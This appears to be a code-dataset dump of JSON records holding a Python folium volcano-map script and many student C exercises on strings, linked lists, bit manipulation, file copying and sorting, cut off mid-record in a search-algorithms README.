[ { "alpha_fraction": 0.6646670699119568, "alphanum_fraction": 0.7006598711013794, "avg_line_length": 51.09375, "blob_id": "d4e8a7c6c66895e08b2dc4d58be0b290512ce74d", "content_id": "333b5a4c174f2f4e032a305928b9240b905be448", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1667, "license_type": "no_license", "max_line_length": 245, "num_lines": 32, "path": "/map1.py", "repo_name": "astark13/webmap_app", "src_encoding": "UTF-8", "text": "import folium, pandas\ndata=pandas.read_csv(\"Volcanoes.txt\") # creates dataframe \nlat=list(data[\"LAT\"]) # turns dataframe column into list\nlon=list(data[\"LON\"])\nelev=list(data[\"ELEV\"])\n\ndef color_producer(elevation):\n if elevation < 1000:\n return 'green'\n elif 1000<=elevation<=3000: \n return 'orange'\n else:\n return 'red'\n\nmap = folium.Map(location=[48.77,-121.81],zoom_start=10, tiles=\"Stamen Terrain\") # creates a map with a base location\n\nfgv = folium.FeatureGroup(name=\"Volcanoes\") # creates a feature group layer that contains markers for volcanoes\n\nfor lt, ln, el in zip(lat,lon,elev):\n fgv.add_child(folium.CircleMarker(location=[lt,ln], radius=6, popup=str(el)+\"m\", \n fill_color=color_producer(el), color='grey', fill_opacity=0.7)) # each marker is represented by a circle, showing the altitude and different colors based on the altitude\n\nfgp = folium.FeatureGroup(name=\"Population\") # creates a feature group layer that contains data about population\n\n# the fgp layer shows borders(areas) and based on data regarding population from the json assigns a color to each country\nfgp.add_child(folium.GeoJson(open(\"world.json\",encoding = \"utf-8-sig\").read(), style_function=lambda x:{'fillColor':'green' if x['properties']['POP2005'] < 10000000 else 'orange' if 10000000 <= x['properties']['POP2005'] < 20000000 else 'red'}))\n\nmap.add_child(fgv) # adds the fgv layer to the map\nmap.add_child(fgp) # adds the fgp layer to the map\nmap.add_child(folium.LayerControl()) # creates a button in the upper right corner allowing you to disable/enable layers\n\nmap.save(\"Map1.html\")\n" } ]
1
david-develop/holbertonschool-low_level_programming
https://github.com/david-develop/holbertonschool-low_level_programming
bf8754f35ea028cec60bdb470d9fcedae0def50a
0403515874b32178ebf1675683d1363fa02ea60c
76d447addcdbc1af83b805ed921690ddc76df255
refs/heads/master
2020-06-06T14:15:13.492697
2020-03-26T20:34:45
2020-03-26T20:34:45
192,760,565
1
2
null
null
null
null
null
[ { "alpha_fraction": 0.5211970210075378, "alphanum_fraction": 0.5336658358573914, "avg_line_length": 17.227272033691406, "blob_id": "f1e739e95324a77d47f455a07893acad0a30353e", "content_id": "0622d0806778b16ef24cb89ae09fcbdfb9a0ce09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 401, "license_type": "no_license", "max_line_length": 58, "num_lines": 22, "path": "/0x07-pointers_arrays_strings/4-strpbrk.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _strpbrk - searches a string for any of a set of bytes.\n * @s: input string.\n * @accept: character to be compared.\n * Return: pointer to string.\n */\nchar *_strpbrk(char *s, char *accept)\n{\n\tunsigned int i, j;\n\tchar *nu = 0;\n\n\tfor (i = 0; s[i] != '\\0'; i++)\n\t{\n\t\tfor (j = 0; accept[j] != '\\0'; j++)\n\t\t{\n\t\t\tif (s[i] == accept[j])\n\t\t\t\treturn (s + i);\n\t\t}\n\t}\n\treturn (nu);\n}\n" }, { "alpha_fraction": 0.5106951594352722, "alphanum_fraction": 0.5240641832351685, "avg_line_length": 13.384614944458008, "blob_id": "5ff8d4ad7f6b67421971a95801f9bb6fd802d033", "content_id": "8c8d9b3b747736f094df4cc8b3f7eb8dadeb8e3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 374, "license_type": "no_license", "max_line_length": 74, "num_lines": 26, "path": "/0x04-more_functions_nested_loops/8-print_square.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_square - Prints diagonal at the n value.\n * @size: variable for the size of the square, defined by the input value.\n */\n\nvoid print_square(int size)\n{\n\tchar a = 35, x, y;\n\n\tif (size > 0)\n\t{\n\t\tfor (y = 0; y < size; y++)\n\t\t{\n\t\t\tfor (x = 0; x < size; x++)\n\t\t\t{\n\t\t\t\t_putchar(a);\n\t\t\t}\n\t\t\t_putchar('\\n');\n\t\t}\n\t}\n\telse\n\t{\n\t\t_putchar('\\n');\n\t}\n}\n" }, { "alpha_fraction": 0.5944055914878845, "alphanum_fraction": 0.6107226014137268, "avg_line_length": 19.428571701049805, "blob_id": "8f1b711fbad3b8f061ded8cb61ef511753153ada", "content_id": "e5402945e4ec41a5331f1673fbf851195a56ee1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 429, "license_type": "no_license", "max_line_length": 61, "num_lines": 21, "path": "/0x14-bit_manipulation/4-clear_bit.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * clear_bit - sets the value of a bit to 0 at a given index.\n * @n: address to the given number.\n * @index: binary index.\n * Return: 1 if worked, -1 if error.\n */\nint clear_bit(unsigned long int *n, unsigned int index)\n{\n\tint a = 1;\n\tunsigned int size;\n\tunsigned long int p;\n\n\tsize = sizeof(unsigned long int) * 8;\n\tif (index > size)\n\t\treturn (-1);\n\tp = (~(a << index));\n\t*n = *n & p;\n\treturn (1);\n}\n" }, { "alpha_fraction": 0.5243682265281677, "alphanum_fraction": 0.5505415201187134, "avg_line_length": 20.30769157409668, "blob_id": "133b785b04451de22abf3d8de60e2a4900ac6ddf", "content_id": "56a73d5baccea2d41a7cdfa4cdbd87cdc8c30a59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1108, "license_type": "no_license", "max_line_length": 66, "num_lines": 52, "path": "/0x0C-more_malloc_free/1-string_nconcat.c", "repo_name": 
"david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * string_nconcat - concatenates one string to another at n bytes.\n * @s1: input string 1.\n * @s2: input string 2.\n * @n: n bytes to be cated.\n * Return: Pointer to allocated memory.\n */\nchar *string_nconcat(char *s1, char *s2, unsigned int n)\n{\n\tchar *cated_string = NULL;\n\tunsigned int i, j, iter_n, total_l, p;\n\n\ti = 0;\n\titer_n = 0;\n\n\tif (s1 == NULL)\n\t\ts1 = \"\";\n\tif (s2 == NULL)\n\t\ts2 = \"\";\n\n\t/*count first and second string*/\n\tfor (i = 0; s1[i] != '\\0'; i++)\n\t\t;\n\tfor (j = 0; s2[j] != '\\0'; j++)\n\t\t;\n\t/*condition if n > a lenght of s2*/\n\tif (n >= j)\n\t\ttotal_l = i + j;\n\telse if (n < j)\n\t\ttotal_l = i + n;\n\n\tcated_string = malloc(sizeof(char) * (total_l + 1));\n\tif (cated_string == NULL)\n\t\treturn (NULL);\n\n\t/*add second string to the first until n and only to the '\\0'*/\n\tfor (iter_n = 0, p = 0; iter_n < total_l; iter_n++)\n\t{\n\t\tif (iter_n < i)\n\t\t\tcated_string[iter_n] = s1[iter_n];\n\t\telse if (iter_n >= i && s2[p] != '\\0')\n\t\t{\n\t\t\tcated_string[iter_n] = s2[p];\n\t\t\tp++;\n\t\t}\n\t}\n\t/* add '\\0' at the end */\n\tcated_string[iter_n] = '\\0';\n\treturn (cated_string);\n}\n" }, { "alpha_fraction": 0.822857141494751, "alphanum_fraction": 0.822857141494751, "avg_line_length": 175, "blob_id": "c87f54b8254e2bc1d749036f2b1fd3e0861dbb82", "content_id": "bda8e8d6dd21c093f054827a8c232950dae6e33f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 175, "license_type": "no_license", "max_line_length": 175, "num_lines": 1, "path": "/0x06-pointers_arrays_strings/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This is a project for study purposes regardles to pointers and arrays, the project must be completed in one day and have different kind of functions using pointers and arrays." 
}, { "alpha_fraction": 0.6051136255264282, "alphanum_fraction": 0.6107954382896423, "avg_line_length": 17.526315689086914, "blob_id": "2470158d6f6e7698e80e4b80fcdbad4b91bdf148", "content_id": "d1e7db2c2506f6986109e3ec315084213a46994a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 354, "license_type": "no_license", "max_line_length": 66, "num_lines": 19, "path": "/0x13-more_singly_linked_lists/6-pop_listint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * pop_listint - deletes the head node of a list.\n * @head: pointer to first node.\n * Return: returns the head node’s data (n) or 0 if list is empty.\n */\nint pop_listint(listint_t **head)\n{\n\tlistint_t *temp;\n\tint n;\n\n\tif (*head == NULL)\n\t\treturn (0);\n\ttemp = *head;\n\tn = temp->n;\n\t*head = temp->next;\n\tfree(temp);\n\treturn (n);\n}\n" }, { "alpha_fraction": 0.8177340030670166, "alphanum_fraction": 0.8177340030670166, "avg_line_length": 39.79999923706055, "blob_id": "ff4d49a7a47d47ca04222bfedf01be13fc7bf6b6", "content_id": "670173ba468d8276110879113e346b59bf38197d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 203, "license_type": "no_license", "max_line_length": 84, "num_lines": 5, "path": "/0x0D-preprocessor/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository contains files about Preprocessor in C, project to study this topis:\n\nWhat are macros and how to use them\nWhat are the most common predefined macros\nHow to include guard your header files" }, { "alpha_fraction": 0.5093333125114441, "alphanum_fraction": 0.5386666655540466, "avg_line_length": 16.85714340209961, "blob_id": "d7ebc83b7168d3560a056c95e5652584d33b9377", "content_id": "a1b62511f4dd90204bf1ce29edc6549855acddd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 750, "license_type": "no_license", "max_line_length": 66, "num_lines": 42, "path": "/0x0B-malloc_free/2-str_concat.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n#include <stdio.h>\n/**\n * str_concat - concatenates two strings in a new allocated space.\n * @s1: given string 1.\n * @s2: given string 2, which is concatenated.\n * Return: Pointer to allocated memory.\n */\nchar *str_concat(char *s1, char *s2)\n{\n\tchar *cat_ar;\n\tunsigned int i, j, cp, r, final_leng;\n\n\tif (s1 == NULL)\n\t\ts1 = \"\";\n\tif (s2 == NULL)\n\t\ts2 = \"\";\n\n\tfor (i = 0; s1[i] != '\\0'; i++)\n\t\t;\n\tfor (j = 0; s2[j] != '\\0'; j++)\n\t\t;\n\tfinal_leng = i + j + 1;\n\n\tcat_ar = malloc(final_leng * sizeof(char));\n\n\tif (cat_ar == NULL)\n\t\treturn (NULL);\n\n\tfor (cp = 0; cp < i; cp++)\n\t{\n\t\tcat_ar[cp] = s1[cp];\n\t}\n\tfor (r = 0; r < j; cp++, r++)\n\t{\n\t\tcat_ar[cp] = s2[r];\n\t}\n\tcat_ar[final_leng] = s2[r];\n\n\treturn (cat_ar);\n}\n" }, { "alpha_fraction": 0.5913357138633728, "alphanum_fraction": 0.6064981818199158, "avg_line_length": 19.072463989257812, "blob_id": "7dbe4b1c4aabffdbc1369b327a95802bd3ff329e", "content_id": "35834f5694813e239e6d07a8dad09e659180d705", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1385, "license_type": "no_license", "max_line_length": 78, "num_lines": 69, "path": 
"/0x1B-sorting_algorithms/104-heap_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n\n/**\n * swap - change position between two position of an array and print the array\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n */\nvoid swap(int *array, int first, int last, size_t size)\n{\n\tint aux, value;\n\n\tvalue = array[first];\n\taux = array[last];\n\tarray[last] = value;\n\tarray[first] = aux;\n\tprint_array(array, size);\n}\n\n/**\n * heap_change - find bigger in a heap level\n * @array: array of integers\n * @size_1: max index in binary tree\n * @size_2: size of the array for printing\n * @i: index of head node.\n */\nvoid heap_change(int *array, size_t size_1, size_t i, size_t size_2)\n{\n\tsize_t max, left, right;\n\n\tmax = i;\n\tleft = 2 * i + 1;\n\tright = 2 * i + 2;\n\n\tif (left < size_1 && array[left] > array[max])\n\t\tmax = left;\n\n\tif (right < size_1 && array[right] > array[max])\n\t\tmax = right;\n\n\tif (max != i)\n\t{\n\t\tswap(array, i, max, size_2);\n\n\t\theap_change(array, size_1, max, size_2);\n\t}\n}\n/**\n * heap_sort - sorts an array of integers in ascending order using the Heap\n * sort algorithm.\n * @array: array of integers\n * @size: size of array\n */\nvoid heap_sort(int *array, size_t size)\n{\n\tint i;\n\n\tif (!array || size == 1)\n\t\treturn;\n\tfor (i = size / 2 - 1; i >= 0; i--)\n\t\theap_change(array, size, i, size);\n\n\tfor (i = size - 1; i > 0; i--)\n\t{\n\t\tswap(array, 0, i, size);\n\t\theap_change(array, i, 0, size);\n\t}\n}\n" }, { "alpha_fraction": 0.5403226017951965, "alphanum_fraction": 0.5524193644523621, "avg_line_length": 12.777777671813965, "blob_id": "a156b24f9ae1a7dc000b2400faccd5adffc9f077", "content_id": "fd5ac6d209934d28120afcdd8040235acfc67f83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 248, "license_type": "no_license", "max_line_length": 48, "num_lines": 18, "path": "/0x02-functions_nested_loops/3-islower.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _islower - Verify if the letter is lowercase.\n * @c: variable for input value.\n * Return: when is a lower letter 1.\n */\n\nint _islower(int c)\n{\n\tif (c >= 'a' && c <= 'z')\n\t{\n\t\treturn (1);\n\t}\n\telse\n\t{\n\t\treturn (0);\n\t}\n}\n" }, { "alpha_fraction": 0.8230088353157043, "alphanum_fraction": 0.8230088353157043, "avg_line_length": 31.285715103149414, "blob_id": "d05997636785bfec0bb171ea6c882a4ddecaa635", "content_id": "01d3bff0f8d97d0d0f38219e0224e0be4541a2ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 226, "license_type": "no_license", "max_line_length": 60, "num_lines": 7, "path": "/0x0F-function_pointers/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository is about function pointers programs:\n\nLearning objectives:\n\nWhat are function pointers and how to use them\nWhat does a function pointer exactly hold\nWhere does a function pointer point to in the virtual memory\n" }, { "alpha_fraction": 0.523668646812439, "alphanum_fraction": 0.5295857787132263, "avg_line_length": 15.095237731933594, "blob_id": "4bb2d0a31369311a92adda828155dc704aaa11a7", "content_id": "7acfb8586de4a5d3dda58f05ef3c15a3b34fc236", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 338, "license_type": "no_license", "max_line_length": 54, "num_lines": 21, "path": "/0x06-pointers_arrays_strings/5-string_toupper.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * string_toupper - print the given string in reverse.\n * @s: given string.\n * Return: the string in upper.\n */\nchar *string_toupper(char *s)\n{\n\tint iter;\n\n\tfor (iter = 0; s[iter] != '\\0'; iter++)\n\t{\n\t\tif (s[iter] >= 'a' && s[iter] <= 'z')\n\t\t{\n\t\t\ts[iter] += 'A' - 'a';\n\t\t}\n\t\telse\n\t\t\tcontinue;\n\t}\n\treturn (s);\n}\n" }, { "alpha_fraction": 0.41923776268959045, "alphanum_fraction": 0.45916515588760376, "avg_line_length": 12.439023971557617, "blob_id": "abbc179e4ea1894b24d5a07a170d7e8a060b91f1", "content_id": "40f2ce643afdc85c874d15895ec8f83a7a9676e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 551, "license_type": "no_license", "max_line_length": 56, "num_lines": 41, "path": "/0x02-functions_nested_loops/11-print_to_98.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n/**\n * print_to_98 - prints the natural numbers from n to 98\n * @n: input value.\n *\n */\n\nvoid print_to_98(int n)\n{\n\tint start;\n\n\tif (n <= 98)\n\t{\n\t\tfor (start = n; start <= 98; start++)\n\t\t{\n\t\t\tif (!(start == 98))\n\t\t\t{\n\t\t\t\tprintf(\"%d, \", start);\n\t\t\t}\n\t\t\telse if (start == 98)\n\t\t\t{\n\t\t\t\tprintf(\"%d\\n\", start);\n\t\t\t}\n\t\t}\n\t}\n\tif (n > 98)\n\t{\n\t\tfor (start = n; start >= 98; start--)\n\t\t{\n\t\t\tif (!(start == 98))\n\t\t\t{\n\t\t\t\tprintf(\"%d, \", start);\n\t\t\t}\n\t\t\telse if (start == 98)\n\t\t\t{\n\t\t\t\tprintf(\"%d\\n\", start);\n\t\t\t}\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.5567867159843445, "alphanum_fraction": 0.5623268485069275, "avg_line_length": 16.190475463867188, "blob_id": "8ae2660a1391ae24d70054b1e54ed6fed008a355", "content_id": "4c772d4111636e5542d65e7fe5630a2248bcd1ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 361, "license_type": "no_license", "max_line_length": 59, "num_lines": 21, "path": "/0x05-pointers_arrays_strings/8-print_array.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n/**\n * print_array - prints n elements of an array of integers.\n * @a: input string.\n * @n: number of elements of the array to be printed.\n */\nvoid print_array(int *a, int n)\n{\n\tint posi;\n\n\tfor (posi = 0; posi < n; posi++)\n\t{\n\t\tprintf(\"%d\", a[posi]);\n\t\tif (posi != (n - 1))\n\t\t{\n\t\t\tprintf(\", \");\n\t\t}\n\t}\n\tprintf(\"\\n\");\n}\n" }, { "alpha_fraction": 0.5470085740089417, "alphanum_fraction": 0.5555555820465088, "avg_line_length": 12.764705657958984, "blob_id": "0e6333578520a0ea857b72b2f00814d9d43e3493", "content_id": "155dc876b173f9b732b154899f5a071a9878101b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 234, "license_type": "no_license", "max_line_length": 48, "num_lines": 17, "path": "/0x05-pointers_arrays_strings/2-strlen.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _strlen - finds the length 
of a given string.\n * @s: input string.\n * Return: lenght of the string.\n */\nint _strlen(char *s)\n{\n\tint leng = 0;\n\n\twhile (*s != '\\0')\n\t{\n\t\tleng++;\n\t\ts++;\n\t}\n\treturn (leng);\n}\n" }, { "alpha_fraction": 0.5262500047683716, "alphanum_fraction": 0.5362499952316284, "avg_line_length": 18.047618865966797, "blob_id": "95c4ed64d75810fb68b2ca0a6ee33fc4567bb16b", "content_id": "1461b65164a117782a6d7a7ee175d3c6ba00dcce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 800, "license_type": "no_license", "max_line_length": 50, "num_lines": 42, "path": "/0x0E-structures_typedef/4-new_dog.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"dog.h\"\n#include <stdlib.h>\n/**\n * new_dog - creates a new struct dog.\n * @name: input name.\n * @age: input age.\n * @owner: input owner name.\n * Return: pointer to struct.\n */\ndog_t *new_dog(char *name, float age, char *owner)\n{\n\tstruct dog *nd;\n\tint i, j, len;\n\n\tfor (i = 0; name[i] != '\\0'; i++)\n\t\t;\n\tfor (j = 0; owner[j] != '\\0'; j++)\n\t\t;\n\n\tnd = malloc(sizeof(struct dog));\n\tif (nd == NULL)\n\t\treturn (NULL);\n\tnd->name = malloc(sizeof(char) * (i + 1));\n\tif (nd->name == NULL)\n\t{\n\t\tfree(nd);\n\t\treturn (NULL);\n\t}\n\tfor (len = 0; len <= i; len++)\n\t\tnd->name[len] = name[len];\n\tnd->age = age;\n\tnd->owner = malloc(sizeof(char) * (j + 1));\n\tif (nd->owner == NULL)\n\t{\n\t\tfree(nd->name);\n\t\tfree(nd);\n\t\treturn (NULL);\n\t}\n\tfor (len = 0; len <= j; len++)\n\t\tnd->owner[len] = owner[len];\n\treturn (nd);\n}\n" }, { "alpha_fraction": 0.5797511339187622, "alphanum_fraction": 0.6306561231613159, "avg_line_length": 21.100000381469727, "blob_id": "eb5295aca16d0a29ef6deab01b9e96b4f581d188", "content_id": "b35cea123e9c0ad8e8cc2094984c10f275685d93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1768, "license_type": "no_license", "max_line_length": 77, "num_lines": 80, "path": "/0x15-file_io/3-cp.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * printerr_97 - function that print error and exit 97 when arguments != 3.\n */\nvoid printerr_97(void)\n{\n\tdprintf(STDERR_FILENO, \"Usage: cp file_from file_to\\n\");\n\texit(97);\n}\n\n/**\n * printerr_98 - function that print error and exit 98, if file_from does not\n * exist, or if you can not read it.\n * @file_from: first argument.\n */\nvoid printerr_98(char *file_from)\n{\n\tdprintf(STDERR_FILENO, \"Error: Can't read from file %s\\n\", file_from);\n\texit(98);\n}\n\n/**\n * printerr_99 - function that print error and exit 99, if file_to can't be\n * created or if write fails.\n * @file_to: second argument.\n */\nvoid printerr_99(char *file_to)\n{\n\tdprintf(STDERR_FILENO, \"Error: Can't write to %s\\n\", file_to);\n\texit(99);\n}\n\n/**\n * printerr_100 - function that print error and exit 100 if close fails\n * @fd: file descriptor value.\n */\nvoid printerr_100(int fd)\n{\n\tdprintf(STDERR_FILENO, \"Error: Can't close fd %d\\n\", fd);\n\texit(100);\n}\n\n/**\n * main - program that copies the content of a file to another file.\n * @ac: arguments count.\n * @av: arguments vector.\n * Return: Always 0 if correct.\n */\nint main(int ac, char **av)\n{\n\tchar *file_from = av[1];\n\tchar *file_to = av[2];\n\tchar buf[1024];\n\tint fd, fd2, letter_co;\n\tssize_t buf_sz = 1024;\n\n\tif (ac != 
3)\n\t\tprinterr_97();\n\tfd = open(file_from, O_RDONLY);\n\tif (fd == -1)\n\t\tprinterr_98(file_from);\n\tfd2 = open(file_to, O_WRONLY | O_CREAT | O_TRUNC | O_APPEND, 0664);\n\tif (fd2 == -1)\n\t\tprinterr_99(file_to);\n\twhile (buf_sz == 1024)\n\t{\n\t\tbuf_sz = read(fd, buf, 1024);\n\t\tif (buf_sz == -1)\n\t\t\tprinterr_98(file_from);\n\t\tletter_co = write(fd2, buf, buf_sz);\n\t\tif (letter_co == -1)\n\t\t\tprinterr_99(file_to);\n\t}\n\tif (close(fd) == -1)\n\t\tprinterr_100(fd);\n\tif (close(fd2) == -1)\n\t\tprinterr_100(fd2);\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.5963060855865479, "alphanum_fraction": 0.6121371984481812, "avg_line_length": 18.947368621826172, "blob_id": "f146146adeed559090a34a2365a4fc8383de0cb9", "content_id": "d6a8bb79a65b29f19d5d15ccfc58799d228e9ba5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 379, "license_type": "no_license", "max_line_length": 59, "num_lines": 19, "path": "/0x14-bit_manipulation/3-set_bit.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * set_bit - sets the value of a bit to 1 at a given index.\n * @n: address to the given number.\n * @index: binary index.\n * Return: 1 if worked.\n */\nint set_bit(unsigned long int *n, unsigned int index)\n{\n\tint a = 1;\n\tunsigned int size;\n\n\tsize = sizeof(unsigned long int) * 8;\n\tif (index > size)\n\t\treturn (-1);\n\t*n = (a << index | *n);\n\treturn (1);\n}\n" }, { "alpha_fraction": 0.6051838397979736, "alphanum_fraction": 0.615431010723114, "avg_line_length": 20.269229888916016, "blob_id": "694df238fbf8e8b38684cabb721f66794cb827c9", "content_id": "0b0ef9fab2d32882aeb07cdee491024aa761126b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1659, "license_type": "no_license", "max_line_length": 73, "num_lines": 78, "path": "/0x13-more_singly_linked_lists/101-print_listint_safe.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n\n/**\n * free_listpoint - frees a listpoin_t list.\n * @head: pointer to first node.\n */\nvoid free_listpoint(listpoin_t *head)\n{\n\tlistpoin_t *cursor;\n\n\twhile (head != NULL)\n\t{\n\t\tcursor = head;\n\t\thead = head->next;\n\t\tfree(cursor);\n\t}\n\tfree(head);\n}\n\n/**\n * add_nodepoint - adds a new node at the beginning of a listpoin_t list.\n * @head: pointer to first node.\n * @p: given address.\n * Return: the address of the new element, or NULL if it failed.\n */\nlistpoin_t *add_nodepoint(listpoin_t **head, void *p)\n{\n\tlistpoin_t *temp2;\n\n\ttemp2 = malloc(sizeof(listpoin_t));\n\tif (temp2 == NULL)\n\t\texit(98);\n\ttemp2->p = p;\n\ttemp2->next = *head;\n\t*head = temp2;\n\treturn (temp2);\n}\n\n/**\n * print_listint_safe - prints a listint_t linked list.\n * @head: pointer to first node.\n * Return: number of nodes in the list\n */\nsize_t print_listint_safe(const listint_t *head)\n{\n\tint count = 0;\n\tconst listint_t *cursor = NULL;\n\tconst listint_t *temp = NULL;\n\tlistpoin_t *cursor2 = NULL;\n\tlistpoin_t *head_strp = NULL;\n\n\tif (head == NULL)\n\t\treturn (0);\n\tcursor = head;\n\tadd_nodepoint(&head_strp, (void *)cursor);\n\tfor (; cursor != NULL; cursor = cursor->next, count++)\n\t{\n\t\tif (cursor->next)\n\t\t\ttemp = cursor->next;\n\t\telse\n\t\t\ttemp = NULL;\n\t\tfor (cursor2 = head_strp; cursor2 != NULL; cursor2 = cursor2->next)\n\t\t{\n\t\t\tif (temp == 
cursor2->p)\n\t\t\t{\n\t\t\t\tprintf(\"[%p] %d\\n\", (void *)cursor, cursor->n);\n\t\t\t\tprintf(\"-> [%p] %d\\n\", (void *)temp, temp->n);\n\t\t\t\tcount++;\n\t\t\t\tfree_listpoint(head_strp);\n\t\t\t\treturn (count);\n\t\t\t}\n\t\t}\n\t\tadd_nodepoint(&head_strp, (void *)temp);\n\t\tprintf(\"[%p] %d\\n\", (void *)cursor, cursor->n);\n\t}\n\tfree_listpoint(head_strp);\n\treturn (count);\n}\n" }, { "alpha_fraction": 0.8186046481132507, "alphanum_fraction": 0.8186046481132507, "avg_line_length": 42.20000076293945, "blob_id": "ac2583e14ba20a7e45bc9f34dd7cee5de2944187", "content_id": "66a9c359d84e69d80ceb19e74af6dfa2d071f98a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 215, "license_type": "no_license", "max_line_length": 88, "num_lines": 5, "path": "/0x0C-more_malloc_free/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository is about malloc and free, different projects to practice this functions.\n\nGeneral\nHow to use the exit function\nWhat are the functions calloc and realloc from the standard library and how to use them." }, { "alpha_fraction": 0.7156374454498291, "alphanum_fraction": 0.7330677509307861, "avg_line_length": 50.487178802490234, "blob_id": "01c545db6e0068cb3f313405fc426a734a4c0dc4", "content_id": "f2c7e4da18356b1ab040e1494b54ba0e1a15b4b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2008, "license_type": "no_license", "max_line_length": 129, "num_lines": 39, "path": "/0x1E-search_algorithms/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### Search Algorithms\n\n## General Learning Objectives:\n\n- What is a search algorithm\n- What is a linear search\n- What is a binary search\n- What is the best search algorithm to use depending on your needs\n\n## Files:\n- 0-linear.c - function that searches for a value in an array of integers using the Linear search algorithm\n- 1-binary.c - function that searches for a value in a sorted array of integers using the Binary search algorithm\n- 2-O - time complexity (worst case) of a linear search in an array of size n\n- 3-O - space complexity (worst case) of an iterative linear search algorithm in an array of size n\n- 4-O - time complexity (worst case) of a binary search in an array of size n\n- 5-O - space complexity (worst case) of a binary search in an array of size n\n- 6-O - space complexity of this function:\n```\nint **allocate_map(int n, int m)\n{\n\tint **map;\n\n\tmap = malloc(sizeof(int *) * n);\n\tfor (size_t i = 0; i < n; i++)\n\t{\n\t\tmap[i] = malloc(sizeof(int) * m);\n\t}\n\treturn (map);\n}\n```\n- 100-jump.c - function that searches for a value in a sorted array of integers using the Jump search algorithm\n- 101-O - time complexity (average case) of a jump search in an array of size n, using step = sqrt(n)\n- 102-interpolation.c - function that searches for a value in a sorted array of integers using the Interpolation search algorithm\n- 103-exponential.c - function that searches for a value in a sorted array of integers using the Exponential search algorithm\n- 104-advanced_binary.c - function that searches for a value in a sorted array of integers.\n- 105-jump_list.c - function that searches for a value in a sorted list of integers using the Jump search algorithm.\n- 106-linear_skip.c - function that searches for a value in a sorted skip list of 
